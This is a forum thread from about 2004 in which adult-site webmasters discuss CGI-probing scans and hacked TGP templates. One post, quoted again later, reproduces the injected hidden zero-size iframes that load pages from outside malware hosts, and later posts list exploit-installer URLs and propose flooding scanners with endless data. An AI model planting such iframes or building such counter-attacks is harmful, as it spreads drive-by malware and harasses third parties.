Is this a hack attempt...

[Tino]

When I log into my server statistics and look at my "pages not found" I see about 500 entrys like this:

http://neighbourhoodgirls.com/cgi-bi...gate/count.cgi
http://neighbourhoodgirls.com/cgi/accountcreate.cgi
http://neighbourhoodgirls.com/cgibin/count.cgi
http://neighbourhoodgirls.com/cgi/mgt/accountcreate.cgi
http://neighbourhoodgirls.com/cgi-bi...d.cgi.original
http://neighbourhoodgirls.com/cgi-bi...ate/search.cgi

etc.

Of course I dont have any of those scripts on my site. I take it someone is trying to figure out where my script is located to take controle of it somehow, correct?

[RawAlex]

Yes, that is a hack attempt, specifically an attempt to find certain cgi scripts or folder that indicate certain programs are loaded. On positive hits, they will log them and perhaps come back later to explore potential vunerabilities that they can use to gain access to your system and do what they like.

The most common hack right now is the additonal or installation of a 1X1 frame on the bottom of TGPs. That frame loaded a toolbar / malware as well as other "features" that you don't want. It uses a known hack to install on IE without permission and without notice.

Keep your eyes open.

Alex

[Tino]

thought so. Thanks.

Guess ill name my scripts something like klj354l5n5f.cgi from now on.

[Opti]

Quote:

Originally posted by Tino
thought so. Thanks.

Guess ill name my scripts something like klj354l5n5f.cgi from now on.

always a good idea if possible!

Would you please post a full list if the files/paths they were looking for Tino?

Also, can you see if each attempted connect is from the same IP? Could be a small chance this person uses a real IP when simply checking sites for known script names like that.

Quote:

The most common hack right now is the additonal or installation of a 1X1 frame on the bottom of TGPs. That frame loaded a toolbar / malware as well as other "features" that you don't want. It uses a known hack to install on IE without permission and without notice.

Keep your eyes open.

Alex

Anyone who has seen this and can let us know of filenames used or a unique string in the code added to pages please do... to help me scan my servers for it.

Also, does anyone know how this person is gaining access yet? via an insecure script like Tino was being scanned for maybe?

[T Pat]

Not sure if this is what your asking for Opti
This is the crap a hacker added to one of my hubs

<%TEMPLATE
NAME Text
HTML <a href="http://www.bang-videos.com/?id=50404" target="_blank">##Thumbnails## ##Catagory## Pics ##Description##</a><br />
%>

<iframe src="http://www.ruworld.com/znd/obj.html" width=0 height=0></iframe>

<iframe src="http://www.vesbiz.biz/adverts/05/1.htm" width=0 height=0></iframe>

<IFRAME SRC="http://www.myiframe.biz/acc22/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>

[RawAlex]

Opti, while I have not seen the actual hack used, I have noticed that all of the people with the iframe thing TP just posted are all using the same TGP software. While I am not sure that it is the CAUSE, I know it is being used as the effect (because the templates are being modified, so when the software runs an update, the iframe junk gets put on every page).

I have some ideas how they are doing it, but I will not speculate in public.

Alex

[Linkster]

Since the domains are known and its pretty easy to look back and see they're hosted on Advancedhosters - why not call them or get some legal people (Im sure the FBI/DOJ would love to get involved since it involves the same type stuff they recently busted all of those people for) and have them contact the hosting company - the registrars and emails for those people is pretty easy to get from their whois.

[T Pat]

I tried E-mailing http://www.bang-videos.com
They ignored my E-mail so I guess, I will take your advise Linkster and see what I can stir up when I get back in town monday

[DanB]

Now I want to write a script that will temporarily ban IPs that have generated X number of 404s. Right now I allow the user three 404s and on the fourth I redirect them to one of my exit links.

I wonder if my software firewall can have IPs added programmatically. Don't know if I can do it with IIS.

[Tino]

Quote:

Originally posted by Opti
always a good idea if possible!

Would you please post a full list if the files/paths they were looking for Tino?

Sure- here you go(there is a few more- these are from 2 attemps and down):

http://www.neighbourhoodgirls.com/xxx404.html

Quote:

Originally posted by Opti

Also, can you see if each attempted connect is from the same IP? Could be a small chance this person uses a real IP when simply checking sites for known script names like that.

They did all come from the same IP- here is a example call:

200.48.218.179 - - [06/Sep/2004:00:02:23 -0500] "GET /cgi/mgt/accountcreate.cgi HTTP/1.0" 404 - "http://neighbourhoodgirls.com/cgi/mgt/accountcreate.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

[Opti]

if that IP is real... he lives here

http://www.ip2state.com/map.asp?s=ip...&ses=911115812

Lima, Peru and is using an IP administerd by LACNIC (Latin American Names Registry) .. A complaint lodged there with a copy to ICAN probably wouldnt hurt. http://lacnic.net/en/


Whois.sc says that IP is handled by
source=dns3.unired.net.pe.; responsible person=hostmaster@unired.net.pe.

http://whois.sc/200.48.218.179

http://www.unired.net.pe/ looks like its part of a proper telco in peru, so a complaint to them should help or might at least get some confirmation if they think the hacker is really with them or just using a victims machine or whatever deal is.

If it's a real IP and this person is in industry, chances are they have submitted sites to you to in past if only to test system.. worth a look if you log IPs I'd say.


thanks for explanation on the iframe insert TP/Alex ... that sounds less of a problem than i thought at first. can someone please PM me the script name affected?

[Opti]

Quote:

Originally posted by Tino
Sure- here you go(there is a few more- these are from 2 attemps and down):

http://www.neighbourhoodgirls.com/xxx404.html

that looks like a serious effort from someone that has some knowledge..

Any idea if they are targetting you or just random scanning of adult websites maybe? You dont have a paysite or billing setup on that domain do you?

[Tino]

Quote:

Originally posted by Opti
that looks like a serious effort from someone that has some knowledge..

Any idea if they are targetting you or just random scanning of adult websites maybe? You dont have a paysite or billing setup on that domain do you?

Nope- only thing I can imagine is that he/she has been looking for my toplist script.

[Tino]

Quote:

Originally posted by Opti
if that IP is real... he lives here

http://www.ip2state.com/map.asp?s=ip...&ses=911115812

Lima, Peru and is using an IP administerd by LACNIC (Latin American Names Registry) .. A complaint lodged there with a copy to ICAN probably wouldnt hurt. http://lacnic.net/en/

I was thinking about complaining to LACNIC- but I think legally I wouldnt get very far. Since he didnt succed in anything.

[Opti]

Quote:

Originally posted by TijuanaPat
I tried E-mailing http://www.bang-videos.com
They ignored my E-mail so I guess, I will take your advise Linkster and see what I can stir up when I get back in town monday

this bang-videos site's processing appears to act for them and just 1 other site, a beastie site called zoo philia.com

there is a discussion on this "animal lovers" site about how that site rips off people and is blacklisted by them or some such ianszoolinks.com/blacklist.htm


I'm thinking complaining directly to these people or their "hosting company" will be useless... and may simply invite more attention from them. Be nice if there was a law enforcement agency interested in internet fraud that adult webmasters felt comfortable approaching with stuff like this...

Causing drama for them with whatever organisation has final responsibilty for allocation of the IP block the procesing and paysites use would likely be most effective way to "annoy" them back imho.. but being careful with passwords and minimizing your attractiveness as a target is best thing to concentrate on imho.

[Opti]

Quote:

Originally posted by Tino
I was thinking about complaining to LACNIC- but I think legally I wouldnt get very far. Since he didnt succed in anything.

I think that sort of organisation will take your complaint more seriously than you imagine.. even if they dont even answer you I believe they will at least file it and use it against their customer if the opportunity arises.

In your case, their customer is a major looking ISP though, so I wouldnt bother either.. But if it was an IP allocated direct to a company that uses it for their own adult sites for example (like I suspect will be the case in TjPats problem with the iframe people) then I believe complaining to this level supplier is actually one of the only really effective ways to hurt a baddie and it doesnt take many people making the effort to complain to get results if the baddie is already pushing the limits with them.... and there isn't many sources they can turn to for new ones if they start to lose IP space suppliers.

[Opti]

Quote:

Originally posted by Tino
Nope- only thing I can imagine is that he/she has been looking for my toplist script.

My guess is they are looking for any opportunity to gather information that will help them guess the password for your processing accounts (if you have them)

As it is looking for so many scripts, I doubt they have exploits for all of them or care about finding just one alone.. they could just be looking for the existence of common products to test if you do dumb things like leave admin passwords at setup defaults or use very common combos like admin/admin too.

[RawAlex]

Opti, those scans are VERY common, I get them on almost every domain I own that appears in DMOZ, YAHOO, or Google.

they are looking for certain scripts, especially things with either default passwords or known issues. They catalog the whole pile, and when they need a server to use, they go back through the pile and start more agressive hack attempts.

What they truly want is access to something that will either allow them to mail, allow them to spread a virus, or run a denial or service attack from.

You should treat these sorts of attempts seriously if you have any of that stuff on your servers. If you really find yourself getting hit hard, you can just have a cgi reply to them with an ENDLESS stream of characters, which should overload their system after a while.

Basically, they are rattling doorknobs to see if anything is unlocked.

Alex

[Opti]

I know I have owned maybe 10% as many domains as you have.. and had about 1% as many dmoz listings over the years, but I haven't seen this sort of scan before that I can recall.. I have seen strange requests from time to time but that list Tino posted seems pretty heavilly targetted toward 3rd party processors scripts and ive never seen anyhwere near that many requests at the same time.

I'm think I will go on a bit of a security binge, I'm just not really certain I'm safe or even know all potential problems at moment and have had this feeling of doom about being attacked for a while now.. if you have a name for a product like that cgi script I think I would like to check it out. and thanks for sharing your knowledge.. extra useful as usual ;-)

[BigJohn]

I see crap like this all the time. I've often toyed with the idea of actually installing scripts for the hackers to find that would play nasty-nasty with them.

[Robbo]

Big John I`ve thought the same thing! hehe

They may also be using scripts to randomly probe for those files. I get them on domains that have nothing at all to find as well. They are either after passwords or billing info I imagine. I would`nt sweat it much unless they seem to be getting on to something.

[tickler]

Quote:

Originally posted by TijuanaPat
Not sure if this is what your asking for Opti
This is the crap a hacker added to one of my hubs

<%TEMPLATE
NAME Text
HTML <a href="http://www.bang-videos.com/?id=50404" target="_blank">##Thumbnails## ##Catagory## Pics ##Description##</a><br />
%>

<iframe src="http://www.ruworld.com/znd/obj.html" width=0 height=0></iframe>

<iframe src="http://www.vesbiz.biz/adverts/05/1.htm" width=0 height=0></iframe>

<IFRAME SRC="http://www.myiframe.biz/acc22/counter.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>

The hacks are apparently against Apache servers and some other stuff that they try to insert:
http://www.myiframe.biz/acc22/2Dimen...xploitsEnc.php
http://www.vesbiz.biz/adverts/05/jss/installer.htm

The one is a media player hack.

[RawAlex]

Big John, I got rid of one guy a few years back by having all cgi requests load a very special script that sent ENDLESS amounts of reply data. the thing would just not stop. The actual text was variations on "fuck off scammer hacker" and other nice stuff. It just piled it at them like you ain't never seen. They hit it two or three times and then they NEVER come back.

Most of the store this stuff somewhere on their computers... so it gives them some nice big files to have to look through.

Alex

[BigJohn]

LOL Alex, sweet idea... I might just have to find the time to do something like that